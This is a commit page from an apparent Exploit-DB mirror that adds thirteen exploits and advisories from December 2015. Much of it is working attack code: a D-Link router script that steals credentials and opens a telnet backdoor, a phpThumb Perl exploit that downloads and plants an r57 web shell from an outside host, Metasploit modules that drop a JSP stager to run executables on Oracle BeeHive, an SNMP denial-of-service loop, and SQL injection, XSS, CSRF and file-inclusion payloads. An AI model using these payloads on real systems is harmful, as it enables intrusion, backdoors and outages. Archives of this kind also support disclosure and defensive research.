bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-12-04

Browse source 
13 new exploits
This commit is contained in:
Offensive Security 2015-12-04 05:01:30 +00:00
parent 46fa0dc772
commit e2ec70e343
14 changed files with 1092 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

15
files.csv
View file

@ -15953,7 +15953,7 @@ id,file,description,date,author,platform,type,port
18404,platforms/php/webapps/18404.pl,"iSupport 1.x - CSRF HTML Code Injection to Add Admin",2012-01-21,Or4nG.M4N,php,webapps,0
18399,platforms/windows/dos/18399.py,"VLC 1.2.0 (libtaglib_pluggin.dll) DoS",2012-01-20,"Mitchell Adair",windows,dos,0
18405,platforms/asp/webapps/18405.txt,"ARYADAD Multiple Vulnerabilities",2012-01-21,"Red Security TEAM",asp,webapps,0
18411,platforms/linux/local/18411.c,"Linux Kernel <= 2.6.39 (32-bit & 64-bit) - Mempodipper Local Root (1)",2012-01-23,zx2c4,linux,local,0
18411,platforms/linux/local/18411.c,"Linux Kernel 2.6.39 <= 3.2.2 (32-bit & 64-bit) - Mempodipper Local Root (1)",2012-01-23,zx2c4,linux,local,0
18407,platforms/php/webapps/18407.txt,"AllWebMenus < 1.1.9 WordPress Menu Plugin - Arbitrary File Upload",2012-01-22,6Scan,php,webapps,0
18410,platforms/php/webapps/18410.txt,"miniCMS 1.0 & 2.0 - PHP Code Inject",2012-01-22,Or4nG.M4N,php,webapps,0
18698,platforms/windows/dos/18698.py,"Xion Audio Player 1.0.127 - (.aiff) Denial of Service Vulnerability",2012-04-04,condis,windows,dos,0
@ -35092,6 +35092,7 @@ id,file,description,date,author,platform,type,port
38819,platforms/php/webapps/38819.txt,"Course Registration Management System Cross Site Scripting and SQL Injection Vulnerabilities",2013-10-21,"Omar Kurt",php,webapps,0
38820,platforms/php/webapps/38820.php,"WordPress This Way Theme 'upload_settings_image.php' Arbitrary File Upload Vulnerability",2013-11-01,Bet0,php,webapps,0
38821,platforms/android/remote/38821.py,"Google Android Signature Verification Security Bypass Vulnerability",2013-11-04,"Jay Freeman",android,remote,0
38822,platforms/windows/webapps/38822.rb,"Sysaid Helpdesk Software 14.4.32 b25 - SQL Injection",2015-11-28,hland,windows,webapps,8080
38831,platforms/php/webapps/38831.txt,"HumHub 0.11.2 and 0.20.0-beta.2 - SQL Injection",2015-11-30,"LSE Leading Security Experts GmbH",php,webapps,80
38825,platforms/multiple/remote/38825.xml,"IBM Cognos Business Intelligence XML External Entity Information Disclosure Vulnerability",2013-10-11,IBM,multiple,remote,0
38826,platforms/linux/remote/38826.py,"Linux Kernel <= 3.0.5 'ath9k_htc_set_bssid_mask()' Function Information Disclosure Vulnerability",2013-12-10,"Mathy Vanhoef",linux,remote,0
@ -35107,6 +35108,7 @@ id,file,description,date,author,platform,type,port
38843,platforms/php/webapps/38843.txt,"TomatoCart 'install/rpc.php' Local File Include Vulnerability",2013-11-18,Esac,php,webapps,0
38835,platforms/multiple/local/38835.py,"Centos 7.1/Fedora 22 - abrt Local Root",2015-12-01,rebel,multiple,local,0
38836,platforms/multiple/webapps/38836.txt,"ntop-ng <= 2.0.151021 - Privilege Escalation",2015-12-01,"Dolev Farhi",multiple,webapps,0
38837,platforms/php/webapps/38837.txt,"IP.Board 4.1.4.x - Persistent XSS Vulnerability",2015-12-01,"Mehdi Alouache",php,webapps,0
38844,platforms/php/webapps/38844.html,"WordPress Blue Wrench Video Widget Plugin Cross Site Request Forgery Vulnerability",2013-11-23,"Haider Mahmood",php,webapps,0
38845,platforms/multiple/remote/38845.txt,"SKIDATA Freemotion.Gate Unauthenticated Web Services Multiple Command Execution Vulnerabilities",2013-11-19,"Dennis Kelly",multiple,remote,0
38846,platforms/multiple/remote/38846.txt,"nginx <= 1.1.17 URI Processing Security Bypass Vulnerability",2013-11-19,"Ivan Fratric",multiple,remote,0
@ -35114,3 +35116,14 @@ id,file,description,date,author,platform,type,port
38848,platforms/php/webapps/38848.php,"WordPress Suco Themes 'themify-ajax.php' Arbitrary File Upload Vulnerability",2013-11-20,DevilScreaM,php,webapps,0
38849,platforms/cgi/remote/38849.rb,"Advantech Switch Bash Environment Variable Code Injection (Shellshock)",2015-12-02,metasploit,cgi,remote,0
38850,platforms/hardware/remote/38850.txt,"Thomson Reuters Velocity Analytics Remote Code Injection Vulnerability",2013-11-22,"Eduardo Gonzalez",hardware,remote,0
38851,platforms/hardware/remote/38851.html,"LevelOne WBR-3406TX Router Cross Site Request Forgery Vulnerability",2013-11-15,"Yakir Wizman",hardware,remote,0
38852,platforms/php/webapps/38852.pl,"phpThumb 'phpThumb.php' Arbitrary File Upload Vulnerability",2013-12-01,DevilScreaM,php,webapps,0
38853,platforms/hardware/remote/38853.sh,"Multiple D-Link DIR Series Routers 'model/__show_info.php' Local File Disclosure Vulnerability",2013-12-02,tytusromekiatomek,hardware,remote,0
38854,platforms/linux/dos/38854.sh,"Net-SNMP SNMPD AgentX Subagent Timeout Denial of Service Vulnerability",2012-09-05,"Ken Farnen",linux,dos,0
38855,platforms/php/webapps/38855.txt,"WordPress Users Ultra Plugin 1.5.50 - Blind SQL injection",2015-12-03,"Panagiotis Vagenas",php,webapps,0
38856,platforms/php/webapps/38856.txt,"WordPress Users Ultra Plugin 1.5.50 - Persistent XSS",2015-12-03,"Panagiotis Vagenas",php,webapps,0
38857,platforms/linux/dos/38857.txt,"Gnome Nautilus 3.16 - Denial of Service",2015-12-03,"Panagiotis Vagenas",linux,dos,0
38858,platforms/windows/dos/38858.txt,"Malwarebytes Antivirus 2.2.0 - DoS PoC",2015-12-03,"Francis Provencher",windows,dos,0
38859,platforms/windows/remote/38859.rb,"Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability",2015-12-03,metasploit,windows,remote,7777
38860,platforms/windows/remote/38860.rb,"Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload",2015-12-03,metasploit,windows,remote,7777
38861,platforms/php/webapps/38861.txt,"WordPress Gwolle Guestbook Plugin 1.5.3 - Remote File Inclusion",2015-12-03,"High-Tech Bridge SA",php,webapps,0

Can't render this file because it is too large.

17
platforms/hardware/remote/38851.html Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/63908/info
LevelOne WBR-3406TX router is prone to a cross-site request-forgery vulnerability.
Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device.
<html>
<body>
<form action="http://www.example.com/cgi-bin/pass" method="POST">
<input type="hidden" name="rc" value="@" />
<input type="hidden" name="Pa" value="1234567" />
<input type="hidden" name="P1" value="1234567" />
<input type="hidden" name="rd" value="atbox" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>

66
platforms/hardware/remote/38853.sh Executable file
View file

@ -0,0 +1,66 @@
source: http://www.securityfocus.com/bid/64043/info
Multiple D-Link DIR series routers are prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on devices running the vulnerable application. This may aid in further attacks.
#!/bin/sh
if [ -z "$1" ]; then
echo "d-link DIR-300 (all), DIR-600 (all), DIR-615 (fw 4.0)";
echo "exploited by AKAT-1, 22733db72ab3ed94b5f8a1ffcde850251fe6f466, c8e74ebd8392fda4788179f9a02bb49337638e7b";
echo "usage: $0 [router address] [telnet port]";
exit 0;
fi;
if [ -z "$2" ]; then
TPORT=3333;
else
TPORT=$2;
fi
UPORT=31337;
echo "Trying $1 ...";
HTTPASSWD=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd"; | grep -A1 "<center>" | tail -1 |
sed -e "s/\t//g ; s/^\([^:]*\):\([^:]*\)$/\1\n \2/g"`;
if [ ! -z "$HTTPASSWD" ]; then
L=`echo $HTTPASSWD | cut -d' ' -f1`;
P=`echo $HTTPASSWD | cut -d' ' -f2`;
echo "found username: $L";
echo "found password: $P";
curl -d "ACTION_POST=LOGIN&LOGIN_USER=$L&LOGIN_PASSWD=$P" -sS "http://$1/login.php"; | grep -v "fail"
1>/dev/null;
if [ $? -eq 0 ]; then
curl -sS
"http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/iptables -t nat -A PRE_MISC -i
eth0.2 -p tcp --dport $TPORT -j ACCEPT&set/runtime/syslog/sendmail=1" 1>/dev/null;
curl -sS
"http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/iptables -t nat -A PRE_MISC -i
eth0.2 -p tcp --dport $UPORT -j ACCEPT&set/runtime/syslog/sendmail=1" 1>/dev/null;
curl -sS
"http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/telnetd -p $TPORT -l
/usr/sbin/login -u hacked:me&set/runtime/syslog/sendmail=1" 1>/dev/null;
echo "if you are lucky telnet is listening on $TPORT (hacked:me) ..."
curl -sS "http://$1/logout.php"; 1>/dev/null;
fi
fi
CHAP=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/etc/ppp/chap-secrets"; | grep -A1 "<center>" | sed -e
"s/<center>//g"`;
if [ ! -z "$CHAP" ]; then
echo "found chap-secrets: $CHAP";
fi
echo "Bye bye.";
exit 0;

34
platforms/linux/dos/38854.sh Executable file
View file

@ -0,0 +1,34 @@
source: http://www.securityfocus.com/bid/64048/info
Net-SNMP is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to cause the SNMPD to crash, exhaust CPU resources or trigger infinite loop; denying service to legitimate users.
Net-SNMP 5.7.1 is vulnerable; other versions may also be affected.
#!/bin/sh
SNMPOPTS="-v1 -c public"
LUCKYSNMPD=$1
SNMPWALKCMD="snmpwalk $SNMPOPTS $LUCKYSNMPD"
SNMPGETCMD="snmpget $SNMPOPTS $LUCKYSNMPD"
SNMPGETNEXTCMD="snmpgetnext $SNMPOPTS $LUCKYSNMPD"
TESTMIB=.1.3.6.1.4.1.8072.2
TESTTELEM=$TESTMIB.5
TESTHDD=$TESTMIB.1.1.2
while true
do
$SNMPGETNEXTCMD $TESTTELEM.1.1.4.1 $TESTTELEM.1.1.4.2 $TESTTELEM.1.1.4.3 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.4.5 $TESTTELEM.1.1.2.3 $TESTTELEM.1.1.6.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.3.1 $TESTTELEM.1.1.1.2 $TESTTELEM.1.1.1.2 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.4.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.3.3 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.8.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.6.1 $TESTTELEM.1.1.2.1
$SNMPGETNEXTCMD $TESTTELEM.1.1.4.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.8.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.4.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.6.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.7.1 $TESTTELEM.1.1.2.1
for i in 1 2 3
do
$SNMPGETNEXTCMD $TESTTELEM.1.1.3 $TESTTELEM.1.1.2 $TESTTELEM.1.1.4 $TESTTELEM.1.1.2 $TESTHDD.4 $TESTHDD.5 $TESTHDD.7 $TESTHDD.5 $TESTHDD.2 $TESTHDD.1 $TESTHDD.4 $TESTHDD.1 $TESTHDD.7 $TESTHDD.1 $TESTHDD.8 $TESTHDD.1 $TESTHDD.14 $TESTHDD.1 $TESTHDD.13 $TESTHDD.1
done
done

76
platforms/linux/dos/38857.txt Executable file
View file

@ -0,0 +1,76 @@
* Exploit Title: Gnome Nautilus [Denial of Service]
* Discovery Date: 2015/10/27
* Public Disclosure Date: 2015/12/01
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: https://www.gnome.org/
* Software Link: https://wiki.gnome.org/Apps/Nautilus
* Version: 3.16
* Tested on: Ubuntu 14.04, Fedora 22
Description
========================================================================
========
Gnome Nautilus <= v3.16 is vulnerable to DoS attack through a
malicious crafted file.
Details
- ------------------------------------------------------------------------
- --------
A malicious crafted file can be used to perform a DoS attack in
Nautilus. The attacker must have local
access to affected system or convince the victim to download the file
(email, web url etc.). Next time
the victim tries to open the directory that contains the malicious
file, Nautilus crashes without warning.
The file must have a `.jp2` extension and start with the JPEG
signature (`0xFFD8`).
Additional Notes
- ------------------------------------------------------------------------
- --------
This seems to happen every time Nautilus is trying to update the
thumbnail of the file.
In Ubuntu and Fedora process dies with the message:
```
Premature end of JPEG file
JPEG datastream contains no image
```
This vulnerability seems to affect all Nautilus versions prior to 3.16.
PoC
========================================================================
========
1. Create a file without a `.jp2` extension in an affected system
2. Open the file in a hex editor so it start with the JPEG signature
(`0xFFD8`)
3. Rename the file so it has the `.jp2` extension
4. Open directory with Nautilus
5. Nautilus dies without warning
Timeline
========================================================================
========
2015/10/27 - Discovered
2015/10/29 - Vendor notified at security@gnome.org
Solution
========================================================================
========
No official solution yet exists.
Work-around
- ------------------------------------------------------------------------
- --------
Disabling generation of thumbnails for all files, through Nautilus
options, will prevent Nautilus from crashing.

37
platforms/php/webapps/38837.txt Executable file
View file

@ -0,0 +1,37 @@
# Exploit Title: IP.Board Persistent XSS Vulnerability
# Date: 29/10/2015
# Software Link: https://www.invisionpower.com/buy
# Software version : 4.1.4.x
# Exploit Author: Mehdi Alouache
# Contact: mehdi.alouache@etu.univ-lehavre.fr
# Category: webapps
1. Description
Any registered user can execute remote javascript code by sending a
private message to another user. The malicious JS code has to
be written in the title of the message, and the receiver must have
enabled the notifications when a new message is delivered.
Note that the code will be directly executed as soon as the notification
appear. (The receiver doesn't even need to check his
inbox).
2. Proof of Concept
Register on the forum (IP.Board) of a website as a regular user, and
send a message to any user having the message notifications
enabled. In the title field (and only here), a simple
<script>alert(1)</script> will show a dialog box to the victim.
3. Solution:
Patch the vulnerability with the (incoming) associated patch.
--
ALOUACHE Mehdi
Departement informatique
Groupe A
mehdi.alouache@hotmail.fr
mehdi.alouache@etu.univ-lehavre.fr

115
platforms/php/webapps/38852.pl Executable file
View file

@ -0,0 +1,115 @@
source: http://www.securityfocus.com/bid/64041/info
phpThumb is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because it fails to properly validate file extensions before uploading them.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
Note: This BID was previously titled 'Joomla! Alphacontent Component 'phpThumb.php' Arbitrary File Upload Vulnerability'. The title and technical details have been changed to better reflect the underlying component affected.
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
$target = $ARGV[0];
if($target eq '')
{
print "======================================================\n";
print " DEVILSCREAM - WWW.NEWBIE-SECURITY.OR.ID \n";
print "======================================================\n";
sleep(0.8);
print "Usage: perl exploit.pl <target> \n";
exit(1);
}
if ($target !~ /http:\/\//)
{
$target = "http://$target";
}
#print "[*] Enter the address of your hosted TXT shell (ex: '
http://c99.gen.tr/r57.txt') => ";
#$shell = <STDIN>;
sleep(1);
print "======================================================\n";
print " DEVILSCREAM - WWW.NEWBIE-SECURITY.OR.ID \n";
print "======================================================\n";
sleep(1.1);
print "[*] Testing exploit ... \n";
sleep(1.1);
$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101
Firefox/14.0.1');
$shell = "wget http://www.r57c99shell.net/shell/r57.txt -O shell.txt";
$website =
"$target/components/com_alphacontent/assets/phpThumb/phpThumb.php??src=file.jpg&fltr
[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; $shell ;
&phpThumbDebug=9";
$request = $agent->request(HTTP::Request->new(GET=>$website));
if ($request->is_success)
{
print "[+] Exploit sent with success. \n";
sleep(1.4);
}
else
{
print "[-] Exploit sent but probably the website is not vulnerable. \n";
sleep(1.3);
}
print "[*] Checking if the txt shell has been uploaded...\n";
sleep(1.2);
$cwebsite =
"$target/components/com_alphacontent/assets/phpThumb/shell.txt";
$creq = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($creq->is_success)
{
print "[+] Txt Shell uploaded :) \n";
sleep(1);
print "[*] Moving it to PHP format... Please wait... \n";
sleep(1.1);
$mvwebsite =
"$target/components/com_alphacontent/assets/phpThumb/phpThumb.php?
src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg
jpeg:fail.jpg ; mv shell.txt shell.php ;
&phpThumbDebug=9";
$mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite));
$cwebsite =
"$target/components/com_alphacontent/assets/phpThumb/shell.php";
$c2req = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($c2req->is_success)
{
print "[+] PHP Shell uploaded => $cwebsite :) \n";
sleep(0.8);
print "[*] Do you want to open it? (y/n) => ";
$open = <STDIN>;
if ($open == "y")
{
$firefox = "firefox $cwebsite";
system($firefox);
}
}
else
{
print "[-] Error while moving shell from txt to PHP :( \n";
exit(1);
}
}
else
{
print "[-] Txt shell not uploaded. :( \n";
}

93
platforms/php/webapps/38855.txt Executable file
View file

@ -0,0 +1,93 @@
* Exploit Title: WordPress Users Ultra Plugin [Blind SQL injection]
* Discovery Date: 2015/10/19
* Public Disclosure Date: 2015/12/01
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://usersultra.com
* Software Link: https://wordpress.org/plugins/users-ultra/
* Version: 1.5.50
* Tested on: WordPress 4.3.1
* Category: webapps
Description
========================================================================
One can perform an SQL injection attack simply by exploiting the
following WP ajax actions:
1. `edit_video`
2. `delete_photo`
3. `delete_gallery`
4. `delete_video`
5. `reload_photos`
6. `edit_gallery`
7. `edit_gallery_confirm`
8. `edit_photo`
9. `edit_photo_confirm`
10. `edit_video_confirm`
11. `set_as_main_photo`
12. `sort_photo_list`
13. `sort_gallery_list`
14. `reload_videos`
POST parameters that are exploitable in each action respectively:
1. `video_id`
2. `photo_id`
3. `gal_id`
4. `video_id`
5. `gal_id`
6. `gal_id`
7. `gal_id`
8. `photo_id`
9. `photo_id`
10. `video_id`
11. `photo_id`, `gal_id`
12. `order`
13. `order`
14. `video_id`
In case #7 a user can also change the gallery name, description and
visibility by setting POST parameters `gal_name`, `gal_desc` and
`gal_visibility` respectively.
In case #8 `photo_id` is first casted to integer and a query to DB is
performed. If results are returned then for each result a new query is
performed without casting the `photo_id` to integer. So if an attacker
knows a valid video id then it can perform the attack in the second
query. This achievable because `<?php (int)'1 and sleep(5)' === 1; ?>
In case #9 a user can also change the photo name, description, tags
and category by setting POST parameters `photo_name`, `photo_desc`,
`photo_tags` and `photo_category` respectively.
In case #10 a user can also change the video name, unique id and type
by setting POST parameters `video_name`, `video_unique_id` and
`video_type` respectively.
Because function wpdb::get_results() and wpdb::query() are in use
here, only one SQL statement can be made per request. This holds
severity of the attack low.
In addition all actions are privileged so the user must have an active
account in vulnerable website, in order to perform the attack.
PoC
========================================================================
Send a post request to
`http://my.vulnerable.website.com/wp-admin/admin-ajax.php` with data:
`action=edit_video&video_id=1 and sleep(5) `
Timeline
========================================================================
2015/10/29 - Vendor notified via email
2015/11/11 - Vendor notified via contact form in his website
2015/11/13 - Vendor notified via support forums at wordpress.org
2015/11/14 - Vendor responded and received report through email
Solution
========================================================================
No official solution yet exists.

49
platforms/php/webapps/38856.txt Executable file
View file

@ -0,0 +1,49 @@
* Exploit Title: WordPress Users Ultra Plugin [Persistence XSS]
* Discovery Date: 2015/10/20
* Public Disclosure Date: 2015/12/01
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://usersultra.com
* Software Link: https://wordpress.org/plugins/users-ultra/
* Version: 1.5.50
* Tested on: WordPress 4.3.1
* Category: webapps
Description
========================================================================
========
Once a user is registered he can add new subscription packages or
modify existing ones. No data sanitization is
taking place before saving package details in DB. This allows a
malicious user to include JS code in package name
and/or package description.
PoC
========================================================================
========
- - Send a post request to
`http://vuln.site.tld/wp-admin/admin-ajax.php` with data:
`action=package_add_new&p_name=a<script>alert(1)</script>`
- - Visit
`http://vuln.site.tld/wp-admin/admin.php?page=userultra&tab=membership`
as
admin or go to the page that
contains package information at front end.
Timeline
========================================================================
========
2015/10/29 - Vendor notified via email
2015/11/11 - Vendor notified via contact form in his website
2015/11/13 - Vendor notified via support forums at wordpress.org
2015/11/14 - Vendor responded and received report through email
Solution
========================================================================
========
No official solution yet exists.

53
platforms/php/webapps/38861.txt Executable file
View file

@ -0,0 +1,53 @@
Advisory ID: HTB23275
Product: Gwolle Guestbook WordPress Plugin
Vendor: Marcel Pol
Vulnerable Version(s): 1.5.3 and probably prior
Tested Version: 1.5.3
Advisory Publication: October 14, 2015 [without technical details]
Vendor Notification: October 14, 2015
Vendor Patch: October 16, 2015
Public Disclosure: November 4, 2015
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8351
Risk Level: Critical
CVSSv3 Base Score: 9.0 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered a critical Remote File Inclusion (RFI) in Gwolle Guestbook WordPress plugin, which can be exploited by non-authenticated attacker to include remote PHP file and execute arbitrary code on the vulnerable system.
HTTP GET parameter "abspath" is not being properly sanitized before being used in PHP require() function. A remote attacker can include a file named 'wp-load.php' from arbitrary remote server and execute its content on the vulnerable web server. In order to do so the attacker needs to place a malicious 'wp-load.php' file into his server document root and includes server's URL into request:
http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]
In order to exploit this vulnerability 'allow_url_include' shall be set to 1. Otherwise, attacker may still include local files and also execute arbitrary code.
Successful exploitation of this vulnerability will lead to entire WordPress installation compromise, and may even lead to the entire web server compromise.
-----------------------------------------------------------------------------------------------
Solution:
Update to Gwolle Guestbook 1.5.4
More Information:
https://wordpress.org/plugins/gwolle-gb/changelog/
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23275 - https://www.htbridge.com/advisory/HTB23275 - PHP File Inclusion in Gwolle Guestbook WordPress Plugin.
[2] Gwolle Guestbook WordPress Plugin - https://wordpress.org/plugins/gwolle-gb/ - Gwolle Guestbook is the WordPress guestbook you've just been looking for.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

49
platforms/windows/dos/38858.txt Executable file
View file

@ -0,0 +1,49 @@
#####################################################################################
Application: Malwarebytes Antivirus
Platforms: Windows
Versions: 2.2.0.
CVE: No CVE have been assigned
Author: Francis Provencher of COSIG
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Malwarebytes Anti-Malware (MBAM) is an application for computers running under the Microsoft Windows and Apple OS Xoperating system that finds and removes malware.[3] Made by Malwarebytes Corporation, it was first released in January 2008. It is available in a free version, which scans for and removes malware when started manually, and a paid version, which additionally provides scheduled scans, real-time protection and a flash memory scanner.
(http://www.oracle.com/us/technologies/embedded/025613.htm)
#####################################################################################
============================
2) Report Timeline
============================
2015-11-28: Francis Provencher of COSIG found the issue;
2015-11-30: Francis Provencher of COSIG report vulnerability to Malwarebytes;
2015-12-02: Malwarebytes release a patch for this issue;
#####################################################################################
============================
3) Technical details
============================
When a malformed executable with an invalid integer (-1) in the “SizeOfRawData” in UPX section is parsed by Malwarebytes, a memory corruption occured. Successful exploitation of the vulnerabilities may allow execution of arbitrary code.
#####################################################################################
===========
4) POC
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38858.exe

155
platforms/windows/remote/38859.rb Executable file
View file

@ -0,0 +1,155 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in Oracle BeeHive. The processEvaluation method
found in voice-servlet can be abused to write a malicious file onto the target machine, and
gain remote arbitrary code execution under the context of SYSTEM.
},
'License' => MSF_LICENSE,
'Author' =>
[
'1c239c43f521145fa8385d64a9c32243', # Found the vuln first
'mr_me <steventhomasseeley[at]gmail.com>', # https://twitter.com/ae0n_ (overlapped finding & PoC)
'sinn3r' # Metasploit
],
'References' =>
[
[ 'CVE', '2010-4417' ],
[ 'ZDI', '11-020' ],
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html' ]
],
'DefaultOptions' =>
{
'RPORT' => 7777
},
'Platform' => 'win',
'Targets' =>
[
['Oracle Beehive 2', {}]
],
'Privileged' => true,
'DisclosureDate' => 'Jun 09 2010',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [ true, "Oracle Beehive's base directory", '/'])
], self.class)
end
def check
res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', 'showRecxml.jsp'))
if res && /RECXML Prompt Tester/ === res.body
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
def exploit
unless check == Exploit::CheckCode::Detected
fail_with(Failure::NotVulnerable, 'Target does not appear to be Oracle BeeHive')
end
# Init some names
exe_name = "#{Rex::Text.rand_text_alpha(5)}.exe"
stager_name = "#{Rex::Text.rand_text_alpha(5)}.jsp"
print_status("Stager name is: #{stager_name}")
print_status("Executable name is: #{exe_name}")
# pwd:
# C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\home
# Targeted path:
# C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\BEEAPP\applications\voice-servlet\voice-servlet\prompt-qa
register_files_for_cleanup(
"../BEEAPP/applications/voice-servlet/voice-servlet/prompt-qa/#{stager_name}"
)
# Ok fire!
print_status("Uploading stager...")
res = upload_stager(stager_name, exe_name)
# Hmm if we fail to upload the stager, no point to continue.
unless res
fail_with(Failure::Unknown, 'Connection timed out.')
end
print_status("Uploading payload...")
upload_payload(stager_name)
end
# Our stager is basically a backdoor that allows us to upload an executable with a POST request.
def get_jsp_stager(exe_name)
jsp = %Q|<%@ page import="java.io.*" %>
<%
ByteArrayOutputStream buf = new ByteArrayOutputStream();
BufferedReader reader = request.getReader();
int tmp;
while ((tmp = reader.read()) != -1) { buf.write(tmp); }
FileOutputStream fostream = new FileOutputStream("#{exe_name}");
buf.writeTo(fostream);
fostream.close();
Runtime.getRuntime().exec("#{exe_name}");
%>|
# Since we're sending it as a GET request, we want to keep it smaller so
# we gsub stuff we don't want.
jsp.gsub!("\n", '')
jsp.gsub!(' ', ' ')
Rex::Text.uri_encode(jsp)
end
# Stager will be found under:
# C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\BEEAPP\applications\voice-servlet\voice-servlet\prompt-qa\
def upload_stager(stager_name, exe_name)
jsp_stager = get_jsp_stager(exe_name)
uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', 'showRecxml.jsp')
send_request_cgi({
'method' => 'GET',
'uri' => uri,
'encode_params' => false, # Don't encode %00 for us
'vars_get' => {
'evaluation' => jsp_stager,
'recxml' => "..\\#{stager_name}%00"
}
})
end
# Payload will be found under:
# C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\home\
def upload_payload(stager_name)
uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', stager_name)
send_request_cgi({
'method' => 'POST',
'uri' => uri,
'data' => generate_payload_exe(code: payload.encoded)
})
end
def print_status(msg)
super("#{rhost}:#{rport} - #{msg}")
end
end

150
platforms/windows/remote/38860.rb Executable file
View file

@ -0,0 +1,150 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload",
'Description' => %q{
This module exploits a vulnerability found in Oracle BeeHive. The prepareAudioToPlay method
found in voice-servlet can be abused to write a malicious file onto the target machine, and
gain remote arbitrary code execution under the context of SYSTEM. Authentication is not
required to exploit this vulnerability.
},
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me <steventhomasseeley[at]gmail.com>', # Source Incite. Vulnerability discovery, PoC
'sinn3r' # MSF module
],
'References' =>
[
[ 'ZDI', '15-550'],
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html' ]
],
'DefaultOptions' =>
{
'RPORT' => 7777
},
'Platform' => 'win',
'Targets' =>
[
['Oracle Beehive 2', {}]
],
'Privileged' => true,
